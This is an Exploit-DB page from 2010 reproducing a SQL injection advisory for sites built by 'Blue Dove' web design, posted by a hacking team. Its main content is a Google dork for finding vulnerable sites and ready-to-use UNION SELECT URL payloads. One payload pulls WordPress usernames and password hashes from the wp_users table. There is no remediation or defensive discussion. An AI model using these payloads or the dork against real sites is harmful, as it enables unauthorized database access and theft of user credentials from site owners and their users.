ad

Blue Dove SQL Injection Vulnerability



EDB-ID: 11360 CVE: N/A OSVDB-ID: N/A
Author: HackXBack Published: 2010-02-08 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
####################################################################
.:. Author : HackXBack [h-b@usa.com]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Blue Dove Word Press Development

.:. Bug Type : Sql Injection
.:. Dork : "powered by Blue Dove Web Design"

####################################################################

===[ Exploit ]===

http://server/path/file.php?id=null[SQL]

http://server/newsletter/newsletter.php?Id=null[SQL]


===[ Example ]===

http://server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14

http://server/newsletter/newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users

http://server/newsletter/newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40





####################################################################

Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack